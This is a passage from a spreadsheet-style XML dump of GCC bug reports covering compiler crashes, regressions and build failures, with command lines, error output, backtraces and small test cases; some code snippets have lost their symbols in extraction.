    <t>GCC-26236</t>
  </si>
  <si>
    <t>[4.2 Regression] CHAR_TYPE is still referenced in c-tree.texi</t>
  </si>
  <si>
    <t>@item INTEGER_TYPE
Used to represent the various integral types including @code{char}
@code{short} @code{int} @code{long} and @code{long long}.  This code
is not used for enumeration types nor for the @code{bool} type.  Note
that GCC's @code{CHAR_TYPE} node is @emph{not} used to represent
@code{char}. 
The sentence with CHAR_TYPE can be just deleted.</t>
  </si>
  <si>
    <t>GCC-28049</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5/4.6 regression] ICE on single + or -</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since GCC 4.1.0:
======================
+
======================
bug.m:1: error: expected ':' at end of input
bug.m:1: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-51086</t>
  </si>
  <si>
    <t>[4.7 regression] ICE in move_insn at haifa-sched.c:3437</t>
  </si>
  <si>
    <t>Between r181096 and r181259 cc1plus started to ICE compiling the stage 1
libstd++:
$  /var/gcc/regression/trunk/11-gcc-gas/build/./gcc/xgcc -shared-libgcc -B/var/gcc/regression/trunk/11-gcc-gas/build/./gcc -nostdinc++ -L/var/gcc/regression/trunk/11-gcc-gas/build/sparc-sun-solaris2.11/libstdc++-v3/src -L/var/gcc/regression/trunk/11-gcc-gas/build/sparc-sun-solaris2.11/libstdc++-v3/src/.libs -B/vol/gcc/sparc-sun-solaris2.11/bin/ -B/vol/gcc/sparc-sun-solaris2.11/lib/ -isystem /vol/gcc/sparc-sun-solaris2.11/include -isystem /vol/gcc/sparc-sun-solaris2.11/sys-include -I/var/gcc/regression/trunk/11-gcc-gas/build/sparc-sun-solaris2.11/libstdc++-v3/include/sparc-sun-solaris2.11 -I/var/gcc/regression/trunk/11-gcc-gas/build/sparc-sun-solaris2.11/libstdc++-v3/include -I/vol/gcc/src/hg/trunk/local/libstdc++-v3/libsupc++ -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -frandom-seed=wlocale-inst.lo -g -O2 -c /vol/gcc/src/hg/trunk/local/libstdc++-v3/src/wlocale-inst.cc  -fPIC -DPIC -o .libs/wlocale-inst.o 
In file included from /var/gcc/regression/trunk/11-gcc-gas/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_facets.h:2607:0
                 from /var/gcc/regression/trunk/11-gcc-gas/build/sparc-sun-solaris2.11/libstdc++-v3/include/locale:42
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/src/locale-inst.cc:30
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/src/wlocale-inst.cc:34:
/var/gcc/regression/trunk/11-gcc-gas/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_facets.tcc: In member function 'void std::__numpunct_cache::_M_cache(const std::locale&amp;) [with _CharT = wchar_t]':
/var/gcc/regression/trunk/11-gcc-gas/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_facets.tcc:128:5: internal compiler error: in move_insn at haifa-sched.c:3437
The failure can be reproduced with the attached input file:
$ cc1plus -fpreprocessed wlocale-inst.ii -quiet -mcpu=v9 -O2 -o wlocale-inst.s
  Rainer</t>
  </si>
  <si>
    <t>GCC-20696</t>
  </si>
  <si>
    <t>all libmudflap tests fail on mips{el}-linux</t>
  </si>
  <si>
    <t>all libmudflap tests fail on mips{el}-linux.
/home/doko/gcc/gcc-4.0-4.0ds9/build/mipsel-linux/./libmudflap/.libs/libmudflap.so:
undefined reference to `_start'
collect2: ld returned 1 exit status
compiler exited with status 1
output is:
/home/doko/gcc/gcc-4.0-4.0ds9/build/mipsel-linux/./libmudflap/.libs/libmudflap.so:
undefined reference to `_start'
collect2: ld returned 1 exit status
or these architectures the symbol should be __start not _start suggested by
Thimo Seufer (one of our mipsel porters) ?</t>
  </si>
  <si>
    <t>GCC-47684</t>
  </si>
  <si>
    <t>-fcompare-debug failure with -O3</t>
  </si>
  <si>
    <t>Created attachment 23297
reduced testcase
Compiler output:
$ gcc -O3 -fcompare-debug testcase.c
gcc: error: testcase.c: -fcompare-debug failure (length)
The generated code is very different with/without debug.
Tested revisions:
r169997 - fail
4.5 r168785 - fail</t>
  </si>
  <si>
    <t>GCC-25861</t>
  </si>
  <si>
    <t>[4.2 Regression] tree check fail at c-common.c:2430</t>
  </si>
  <si>
    <t>I just tried to compile package gnugk-2.2.3-2 from Suse Linux with a recent
GNU C compiler version 4.2 snapshot 20060114. 
The compiler snapshot said
/home/dcb/gnu/42-20060114/results/bin/g++ -g -O3 -Wall -fmessage-length=0 -DHAS_RADIUS=1 -DHAS_MSG_NOSIGNAL=1  -D'MANUFACTURER=GNU' -D'PROGRAMMNAME=Gatekeeper' -DPTRACING  -D_REENTRANT -Wall  -O2 -g -fmessage-length=0 -D_FORTIFY_SOURCE=2 -fexceptions -DP_64BIT -I/usr/share/pwlib//include -DPTRACING
-I/usr/include/openh323 -DMAJOR_VERSION=2 -DMINOR_VERSION=2 -DBUILD_NUMBER=3 -Os   -felide-constructors -x c++ -c main.cxx -o obj_linux_x86_64_r/main.o
/usr/include/ptlib/notifier.h: In constructor 'PNotifierFunction::PNotifierFunction(void*)':
/usr/include/ptlib/notifier.h:42: internal compiler error: tree check: expected tree that contains 'decl with visibility' structure have 'parm_decl'  in c_common_truthvalue_conversion at c-common.c:2430
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [obj_linux_x86_64_r/main.o] Error 1
Preprocessed source code attached.</t>
  </si>
  <si>
    <t>GCC-39573</t>
  </si>
  <si>
    <t>Linking fails on AMD with -march=native and -fopenmp works with generic x86_64</t>
  </si>
  <si>
    <t>Linking in debugging mode is fine:
$ make CNF=gcc MODE=debug
scons -j 2 CNF=gcc MODE=debug BACKEND=
scons: Reading SConscript files ...
scons: done reading SConscript files.
scons: Building targets ...
g++ -o main.o -c -pipe -I. -Wall -g -fopenmp main.cpp
g++ -o tinystr.o -c -pipe -I. -Wall -g -fopenmp tinystr.cpp
g++ -o tinyxml.o -c -pipe -I. -Wall -g -fopenmp tinyxml.cpp
g++ -o tinyxmlerror.o -c -pipe -I. -Wall -g -fopenmp tinyxmlerror.cpp
g++ -o tinyxmlparser.o -c -pipe -I. -Wall -g -fopenmp tinyxmlparser.cpp
g++ -o shapes -g -fopenmp tinystr.o tinyxml.o tinyxmlerror.o tinyxmlparser.o main.o -lcvmlcpp
scons: done building targets.
But in release mode it's not:
$ make CNF=gcc
scons -j 2 CNF=gcc MODE= BACKEND=
scons: Reading SConscript files ...
scons: done reading SConscript files.
scons: Building targets ...
g++ -o main.o -c -pipe -I. -Wall -O3 -funroll-loops -fopenmp -march=native -ftree-vectorize -DNDEBUG main.cpp
g++ -o tinystr.o -c -pipe -I. -Wall -O3 -funroll-loops -fopenmp -march=native -ftree-vectorize -DNDEBUG tinystr.cpp
g++ -o tinyxml.o -c -pipe -I. -Wall -O3 -funroll-loops -fopenmp -march=native -ftree-vectorize -DNDEBUG tinyxml.cpp
g++ -o tinyxmlerror.o -c -pipe -I. -Wall -O3 -funroll-loops -fopenmp -march=native -ftree-vectorize -DNDEBUG tinyxmlerror.cpp
g++ -o tinyxmlparser.o -c -pipe -I. -Wall -O3 -funroll-loops -fopenmp -march=native -ftree-vectorize -DNDEBUG tinyxmlparser.cpp
g++ -o shapes -fopenmp tinystr.o tinyxml.o tinyxmlerror.o tinyxmlparser.o main.o -lcvmlcpp
main.o: In function `_ZN7cvmlcppL25extractSurfaceFromAdapterIN6shapes20ShapeSurfaceAdaptor_IdEEdEEvRKT_RNS_8GeometryIT0_EEd.omp_fn.1':
main.cpp:(.text+0x5838): undefined reference to `void cvmlcpp::extractSurfaceFromAdapter double&gt;(shapes::ShapeSurfaceAdaptor_ const&amp; cvmlcpp::Geometry&amp; double)::C.724'
collect2: ld returned 1 exit status
scons: *** [shapes] Error 1
scons: building terminated because of errors.
make: *** [compile] Error 2
$ g++ -v
Using built-in specs.
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.3.2-1ubuntu12' --with-bugurl=file:///usr/share/doc/gcc-4.3/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.3 --program-suffix=-4.3 --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-mpfr --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.3.2 (Ubuntu 4.3.2-1ubuntu12) 
Unfortunately I'm not exactly sure how to complete this report. I have no idea what component does this so I just guessed. And should I simply attach all source code ?</t>
  </si>
  <si>
    <t>fpbeekhof</t>
  </si>
  <si>
    <t>GCC-30897</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with default argument in template template parameter</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 3.1:
====================================================================
template class U&gt; struct A
{
  template U foo()
}
====================================================================
bug.cc:3: internal compiler error: in tsubst at cp/pt.c:7450
Please submit a full bug report [etc.]
This is related to PR 30044 but here we have a regression.</t>
  </si>
  <si>
    <t>GCC-55921</t>
  </si>
  <si>
    <t>[4.6 Regression] Crash in verify_ssa for asm to side-steps complex pessimization</t>
  </si>
  <si>
    <t>Created attachment 29126
testcase
verify_ssa crashes during expand for a simple testcase that uses a pair of
asms to avoid the tree pass pessimization of complex type data moves.
Observed with GCC 4.7.0 i686-pc-linux-gnu X epiphany-elf
i686-pc-linux-gnu native Red Hat 4.7.2-2 and
i686-pc-linux-gnu native 4.8.0 20130109 (experimental) (revision 195054)
(gdb) run
Starting program: /ssd/fsf/inst/libexec/gcc/i686-pc-linux-gnu/4.8.0/cc1 -fpreprocessed tc3.i -quiet -dumpbase tc3.c -mtune=generic -march=pentiumpro -auxbase tc3 -version -o tc3.s
GNU C (GCC) version 4.8.0 20130109 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 4.8.0 20130109 (experimental) GMP version 5.0.2 MPFR version 3.1.0 MPC version 0.9
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C (GCC) version 4.8.0 20130109 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 4.8.0 20130109 (experimental) GMP version 5.0.2 MPFR version 3.1.0 MPC version 0.9
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 7fd55bd33553a03a09fb094c59fe563c
Program received signal SIGSEGV Segmentation fault.
verify_ssa (check_modified_stmt=true) at ../../gcc/gcc/tree-ssa.c:942
942               if (!gimple_nop_p (stmt))
(gdb) bt
#0  verify_ssa (check_modified_stmt=true) at ../../gcc/gcc/tree-ssa.c:942
#1  0x084c6fbe in execute_function_todo (data=data@entry=0x8001c)
    at ../../gcc/gcc/passes.c:1969
#2  0x084c7788 in do_per_function (
    callback=0x84c6f20  data=0x8001c)
    at ../../gcc/gcc/passes.c:1703
#3  0x084c78ba in execute_todo (flags=524316) at ../../gcc/gcc/passes.c:2001
#4  0x084cabff in execute_one_pass (pass=pass@entry=0x8dced80)
    at ../../gcc/gcc/passes.c:2321
#5  0x084cb035 in execute_pass_list (pass=0x8dced80)
    at ../../gcc/gcc/passes.c:2383
#6  0x0826186e in expand_function (node=0xb7be93f0)
    at ../../gcc/gcc/cgraphunit.c:1641
#7  0x08263bb4 in output_in_order () at ../../gcc/gcc/cgraphunit.c:1834
#8  compile () at ../../gcc/gcc/cgraphunit.c:2038
#9  0x08263f2a in finalize_compilation_unit ()
    at ../../gcc/gcc/cgraphunit.c:2120
#10 0x08137e45 in c_write_global_declarations ()
    at ../../gcc/gcc/c/c-decl.c:10120
#11 0x0856d85d in compile_file () at ../../gcc/gcc/toplev.c:559
#12 0x0856f82c in do_compile () at ../../gcc/gcc/toplev.c:1878
#13 toplev_main (argc=13 argv=0xbfffeda4) at ../../gcc/gcc/toplev.c:1954
#14 0x0811a2cb in main (argc=13 argv=0xbfffeda4) at ../../gcc/gcc/main.c:36
(gdb) frame 0
#0  verify_ssa (check_modified_stmt=true) at ../../gcc/gcc/tree-ssa.c:942
942               if (!gimple_nop_p (stmt))
(gdb) p stmt
$1 = (gimple_statement_d *) 0x0</t>
  </si>
  <si>
    <t>GCC-60881</t>
  </si>
  <si>
    <t>ICE on dummy argument that extends a type with scalar and scalar coarry components</t>
  </si>
  <si>
    <t>The code and error message below demonstrate an ICE that occurs when passing an actual argument that extends a type with two components: a default-initialized scalar and an allocatable scalar coarray.
Damian
$ cat all.f90 
program main
  implicit none
  type co_object
    logical :: defined=.false.
    real allocatable :: dummy_to_facilitate_extension[:]
  end type
  type extends(co_object) :: global_field
  end type
  type(global_field) T
  call assign_local_field(T)
contains
  subroutine assign_local_field(lhs)
    type(global_field) lhs
  end subroutine
end program
$ gfortran -fcoarray=single all.f90 
all.f90: In function 'MAIN__':
all.f90:9:0: internal compiler error: in fold_convert_loc at fold-const.c:2116
   type(global_field) T
 ^
all.f90:9:0: internal compiler error: Abort trap: 6
gfortran: internal compiler error: Abort trap: 6 (program f951)
Abort trap: 6
$ gfortran --version
GNU Fortran (MacPorts gcc49 4.9-20140406_0) 4.9.0 20140406 (experimental)
Copyright (C) 2014 Free Software Foundation Inc.</t>
  </si>
  <si>
    <t>GCC-19102</t>
  </si>
  <si>
    <t>[3.4 Regression] -march=pentium3 breaks linux kernel compiles w/ gcc-3_4-branch as of 2004/12/20</t>
  </si>
  <si>
    <t>gcc -Wp-MDinit/.main.o.d -nostdinc -iwithprefix include -D__KERNEL__ 
-Iinclude  -Wall -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing 
-fno-common -ffreestanding -std=gnu89 -O2     -fomit-frame-pointer -pipe 
-msoft-float -mpreferred-stack-boundary=2 -march=pentium3 
-Iinclude/asm-i386/mach-default -Wdeclaration-after-statement    
-DKBUILD_BASENAME=main -DKBUILD_MODNAME=main -c -o init/.tmp_main.o 
init/main.c 
init/main.c: In function `unknown_bootoption': 
include/asm/string.h:190: error: `asm' operand requires impossible reload 
include/asm/string.h:190: error: `asm' operand requires impossible reload 
include/asm/string.h:129: error: `asm' operand requires impossible reload 
init/main.c:197: error: insn does not satisfy its constraints: 
(insn 611 481 200 5 (set (reg:SI 1 dx) 
        (reg/v/f:SI 22 xmm1 [orig:89 s ] [89])) 36 {*movsi_1} (nil) 
    (nil)) 
init/main.c:197: confused by earlier errors bailing out 
make[1]: *** [init/main.o] Error 1 
make: *** [init] Error 2 
Works with any of -march=i386 -march=i586 -march=i686 -march=pentium4 
-march=athlon</t>
  </si>
  <si>
    <t>GCC-80675</t>
  </si>
  <si>
    <t>Incorrect implementation of LWG 2534</t>
  </si>
  <si>
    <t>#include 
struct X { }
std::ostream }
struct O : std::ostream { }
void operator&lt;&lt;(O
int main()
{
  O{} &lt;&lt; X{}
}
This should compile because the operator&amp;&amp; const T&amp;) overload should be chosen by overload resolution.
However we implement the os .</t>
  </si>
  <si>
    <t>GCC-5901</t>
  </si>
  <si>
    <t>[IA64] misplaced .body</t>
  </si>
  <si>
    <t>The generated assembler output contains a .save.f pseudo-op outside of a .prologue/.body pair.
Release:
3.1 20020309 (prerelease)
Environment:
System: Linux sykes 2.4.18-SMP #1 SMP Sat Mar 2 18:52:42 UTC 2002 ia64 unknown
Architecture: ia64
host: ia64-unknown-linux-gnu
build: ia64-unknown-linux-gnu
target: ia64-unknown-linux-gnu
configured with: /cvs/branch/gcc/configure --host=ia64-linux --prefix=/usr/local/ia64-linux --enable-shared --enable-threads --with-system-zlib --enable-languages=c : (reconfigured)
How-To-Repeat:
$ gcc -O2 -mfixed-range=f10-f15f32-f127 -S fbcon-cfb16.i
$ head -20 fbcon-cfb16.s
 .file fbcon-cfb16.i
 .pred.safe_across_calls p1-p5p16-p63
 .text
 .align 16
 .global fbcon_cfb16_clear#
 .proc fbcon_cfb16_clear#
fbcon_cfb16_clear:
 .prologue
 .body
 .mii
 adds r21 = 26 r33
 adds r22 = 24 r33
 adds r15 = 16 r33
 .mii
 .save.f 0x1
 stf.spill [r12] = f2
 cmp.eq p8 p9 = 0 r32
 adds r17 = 8 r33
 .mmi</t>
  </si>
  <si>
    <t>GCC-8444</t>
  </si>
  <si>
    <t>fastjar needs an ANSI compiler to build</t>
  </si>
  <si>
    <t>Build gcc-3.2 on hpux10.20 using the unbundled HP compiler
failed compiling fastjar because the compiler was left in K&amp;R
mode. If fastjar requires an ANSI compiler shouldn't it be
built with the target compiler when host == target?
make[2]: Entering directory `/devel/src/gcc-3.2.obj/fastjar'
cc -DHAVE_CONFIG_H -I. -I..../gcc-3.2/fastjar -I. -I. -I..../gcc-3.2/fastjar \  
-I..../gcc-3.2/fa stjar/../zlib -I..../gcc-3.2/fastjar/../include -g -c \
..../gcc-3.2/fastjar/jartool.c
cc: ..../gcc-3.2/fastjar/dostime.h line 22: error 1000: \
Unexpected symbol: *.
cc: ..../gcc-3.2/fastjar/pushback.h line 22: error 1000: \
Unexpected symbol: ub1.
cc: ..../gcc-3.2/fastjar/pushback.h line 3031328385: error 1000: \
Unexpected symbol: *.
cc: ..../gcc-3.2/fastjar/compress.h line 85: error 1000: \
Unexpected symbol: ub4.
cc: ..../gcc-3.2/fastjar/jartool.c line 267: error 1000: \
Unexpected symbol: *.
cc: ..../gcc-3.2/fastjar/dostime.h line 20: error 1705: \
Function prototypes are an ANSI feature.
cc: ..../gcc-3.2/fastjar/dostime.h line 21: error 1705: \
Function prototypes are an ANSI feature.
cc: ..../gcc-3.2/fastjar/dostime.h line 22: error 1506: \
Parameters allowed in function definition only.
cc: ..../gcc-3.2/fastjar/pushback.h line 22: error 1573 : \
Type of pb_buff is undefined due to an illegal declaration.
Release:
3.2
Environment:
hppa1.1-hp-hpux10.20 --with-gnu-as</t>
  </si>
  <si>
    <t>GCC-6247</t>
  </si>
  <si>
    <t>Konqueror miscompilation on IA-32</t>
  </si>
  <si>
    <t>See http://gcc.gnu.org/ml/gcc-patches/2002-04/msg00514.html
Release:
3.1 20020410 (prerelease)
Environment:
i386-redhat-linux
How-To-Repeat:
Compile and run the testcase posted at
http://gcc.gnu.org/ml/gcc-patches/2002-04/msg00514.html
at -O and above.</t>
  </si>
  <si>
    <t>GCC-35377</t>
  </si>
  <si>
    <t>stack-protector: multiple definition of `__stack_chk_fail_local'</t>
  </si>
  <si>
    <t>I was compiled and installed gcc-4.2.3 on Linux 2.4 glibc 2.3.6
main configure options was:
--enable-shared=libstdc++
--enable-static
--disable-debug
--enable-cpp
--enable-languages=cc++
--enable-threads
After successfully compile and install got some problems when compiling apps
using the -fstack-protector option:
Linking C executable at-parser
/pkg/lib/gcc/i686-pc-linux-gnu/4.2.3/../../../libssp.a(ssp.o): In function `__stack_chk_fail_local':
/home/gzp/src/gcc-4.2.3/obj/i686-pc-linux-gnu/libssp/../../../libssp/ssp.c:175: multiple definition of `__stack_chk_fail_local'
/pkg/lib/gcc/i686-pc-linux-gnu/4.2.3/../../../libssp_nonshared.a(libssp_nonshared_la-ssp-local.o):/home/gzp/src/gcc-4.2.3/obj/i686-pc-linux-gnu/libssp/../../../libssp/ssp-local.c:48: first defined here
collect2: ld returned 1 exit status
make[3]: *** [tests/at-parser] Error 1
libssp present only in static format as libssp_nonshared.</t>
  </si>
  <si>
    <t>gzp</t>
  </si>
  <si>
    <t>GCC-71826</t>
  </si>
  <si>
    <t>[7 Regression] ICE on valid C++ code with ambiguous member lookup: tree check: expected baselink have error_mark in tsubst_baselink at cp/pt.c:13737</t>
  </si>
  <si>
    <t>The following C++ code causes an ICE when compiled with the current GCC trunk on x86_64-linux-gnu in both 32-bit and 64-bit modes.  
It is a regression from 6.1.x. 
The code seems to be (mistakenly?) accepted by both Clang and ICC. 
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160709 (experimental) [trunk revision 238191] (GCC)
$
$ clang++-3.8 -c small.cpp
$
$ g++-6.1 -c small.cpp
small.cpp: In instantiation of â€˜void C::f() [with T = int]â€™:
small.cpp:13:7:   required from here
small.cpp:7:16: error: request for member â€˜iâ€™ is ambiguous
   void f () {  i ()  }
                ^
small.cpp:3:18: note: candidates are: void B::i()
 struct B {  void i () {}  }
                  ^
small.cpp:1:36: note:                 int A::i
 template  struct A {  int i  }
                                    ^
$
$ g++-trunk -c small.cpp
small.cpp: In instantiation of â€˜void C::f() [with T = int]â€™:
small.cpp:13:7:   required from here
small.cpp:7:18: error: request for member â€˜iâ€™ is ambiguous
   void f () {  i ()  }
                ~~^~
small.cpp:3:18: note: candidates are: void B::i()
 struct B {  void i () {}  }
                  ^
small.cpp:1:36: note:                 int A::i
 template  struct A {  int i  }
                                    ^
small.cpp:7:18: internal compiler error: tree check: expected baselink have error_mark in tsubst_baselink at cp/pt.c:13737
   void f () {  i ()  }
                ~~^~
0x105f7ec tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc-source-trunk/gcc/tree.c:9751
0x6fcbf7 tree_check
        ../../gcc-source-trunk/gcc/tree.h:3030
0x6fcbf7 tsubst_baselink
        ../../gcc-source-trunk/gcc/cp/pt.c:13737
0x6e52b0 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:16865
0x6e48aa tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:16536
0x6d6cbf tsubst_expr(tree_node* tree_node* int tree_node* bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:15868
0x6d735a tsubst_expr(tree_node* tree_node* int tree_node* bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:15180
0x6d81f0 tsubst_expr(tree_node* tree_node* int tree_node* bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:15351
0x6d4bf5 instantiate_decl(tree_node* int bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:22095
0x7218d2 instantiate_pending_templates(int)
        ../../gcc-source-trunk/gcc/cp/pt.c:22214
0x764a05 c_parse_final_cleanups()
        ../../gcc-source-trunk/gcc/cp/decl2.c:4600
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
----------------------------------------------
template  struct A {  int i  }
struct B {  void i () {}  }
template  struct C : A  B
{ 
  void f () {  i ()  }
}
int main ()
{ 
  C  c
  c.f()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-23151</t>
  </si>
  <si>
    <t>print (buf format) expression should be invalid</t>
  </si>
  <si>
    <t>The following is illegal:
$ cat print.f90
program main
  character*80 line
  print (line'(A)') 'hello'
end program main
$ cat print.f90
program main
  character*80 line
  print (line'(A)') 'hello'
end program main
$ gfortran print.f90
$ gfortran -std=f95 print.f90
$ gfortran -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.1/configure --prefix=/home/ig25
--enable-languages=cf95 : (reconfigured) ../gcc-4.1/configure
--prefix=/home/ig25 --enable-languages=cf95
Thread model: posix
gcc version 4.1.0 20050726 (experimental)</t>
  </si>
  <si>
    <t>GCC-20300</t>
  </si>
  <si>
    <t>ICE on undefined value of type derived from Character</t>
  </si>
  <si>
    <t>The following program results in an ICE:
procedure Undefined_Derived_Char is
   type Char is new Character
   C : Char
begin
   case C is
      when XXX =&gt;
         null
      when others =&gt;
         null
   end case
end Undefined_Derived_Char
It seems that the checks in Sem_Ch8.Find_Direct_Name.Undefined should take into
account that Case_Typ can be a type derived from one of the character types:
               if Is_Enumeration_Type (Case_Typ)
                 and then Case_Typ /= Standard_Character
                 and then Case_Typ /= Standard_Wide_Character
                 and then Case_Typ /= Standard_Wide_Wide_Character
               then
Maybe Is_Enumeration_Type (Case_Typ) and not Is_Character_Type (Case_Typ) is the
correct test?</t>
  </si>
  <si>
    <t>GCC-25217</t>
  </si>
  <si>
    <t>Derived type dummy argument having intent(out) attribute</t>
  </si>
  <si>
    <t>1. There is a procedure (function/subroutine) call. A variable of derived type is passed as actual argument to this procedure. One of the components of derived type is default initialized.
2. Corresponding dummy argument has INTENT(OUT) attribute. 
When above two conditions are satisfied then according if dummy argument is accessed in procedure it should be default initialized. But this is NOT the behaviour of gfortran. 
e.g. consider following example
program main
type drv
integer::a(10)=10
end type drv
type (drv)::aa
aa%a=100
ret=fun(aa)
contains
function fun(fa)
type (drv)intent(out)::fa !---------(A) integer::fun print *fa%a
fun=fa%a(1)
end function fun
end
Please see line marked (A). Here fa should be reinitialized to default value 10. But this is not happening in gfortran.</t>
  </si>
  <si>
    <t>sudeshc</t>
  </si>
  <si>
    <t>GCC-36520</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in get_memory_rtx</t>
  </si>
  <si>
    <t>Program received signal SIGSEGV Segmentation fault.
0x0000000000b3b4e0 in host_integerp (t=0x0 pos=0)
    at /space/rguenther/src/svn/trunk/gcc/tree.c:4938
4938      return (TREE_CODE (t) == INTEGER_CST
#1  0x0000000000504a0d in get_memory_rtx (exp=0x2b5573d27870 
    len=0x2b5573b18420) at /space/rguenther/src/svn/trunk/gcc/builtins.c:1128
#2  0x000000000050e97b in expand_builtin_memcpy (exp=0x2b5573d705a0 
    target=0x2b55730d6450 mode=VOIDmode)
    at /space/rguenther/src/svn/trunk/gcc/builtins.c:3354
possibly caused by
2008-06-11  Eric Botcazou  
            Olivier Hainque  
        * builtins.c (get_memory_rtx): Accept byte-addressable bitfields.
        Use DECL_SIZE_UNIT to retrieve the size of the field.</t>
  </si>
  <si>
    <t>GCC-59754</t>
  </si>
  <si>
    <t>[ree.c] Incorrect merge while working with vector registers</t>
  </si>
  <si>
    <t>Hello
It seems that this revision:
git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@206418 138bc75d-0d04-0410-961f-82ee72b054a4
made bunch of AVX-512F tests failing (at runtime):
The difference in assembler is as following.
For good (prev. rev. testname: gcc.target/i386/avx512f-vpmovzxwd-2.c):
...
        vmovdqa 160(%esp) %ymm0
        movl    $-22854 %eax
        leal    384(%esp) %ebx
        kmovw   %eax %k1
        xorl    %edx %edx
        vpmovzxwd       %ymm0 %zmm1
        vmovdqa64       %zmm1 192(%esp)
        vmovdqa64       256(%esp) %zmm1
        vpmovzxwd       %ymm0 %zmm1{%k1}
        vpmovzxwd       %ymm0 %zmm0{%k1}{z}
        vmovdqa64       %zmm1 256(%esp)
        vmovdqa64       %zmm0 320(%esp)
...
For broken:
...
        vpmovzxwd       160(%esp) %zmm1
        movl    $-22854 %eax
        leal    384(%esp) %ebx
        kmovw   %eax %k1
        xorl    %edx %edx
        vmovdqa64       %zmm1 %zmm0
        vmovdqa64       %zmm1 192(%esp)
        vmovdqa64       256(%esp) %zmm1
        vpmovzxwd       %ymm0 %zmm1{%k1}
        vpmovzxwd       %ymm0 %zmm0{%k1}{z}
        vmovdqa64       %zmm1 256(%esp)
        vmovdqa64       %zmm0 320(%esp)
...
So it seems that it is allowed to convert:
  (set r0 [mem])
  (set r1 sign_extend (r0))
to:
  (set r1 sign_extend ([mem]))
  (set r0 r1)
IMHO this should work with scalar but not with vectors.
I suspect eliminating such extends for vector types were
prohibited initially.</t>
  </si>
  <si>
    <t>GCC-31005</t>
  </si>
  <si>
    <t>[4.3 Regression] build failure on powerpc-darwin while building codecvt.cc</t>
  </si>
  <si>
    <t>In file included from /Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/locale:43
                 from /Users/regress/tbox/svn-gcc/libstdc++-v3/src/codecvt.cc:30:
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:58:34: error: macro isspace passed 2 arguments but takes just 1
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:62:34: error: macro isprint passed 2 arguments but takes just 1
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:66:34: error: macro iscntrl passed 2 arguments but takes just 1
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:70:34: error: macro isupper passed 2 arguments but takes just 1
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:74:34: error: macro islower passed 2 arguments but takes just 1
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:78:34: error: macro isalpha passed 2 arguments but takes just 1
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:82:34: error: macro isdigit passed 2 arguments but takes just 1
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:86:34: error: macro ispunct passed 2 arguments but takes just 1
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:90:35: error: macro isxdigit passed 2 arguments but takes just 1
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:94:34: error: macro isalnum passed 2 arguments but takes just 1
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:98:34: error: macro isgraph passed 2 arguments but takes just 1
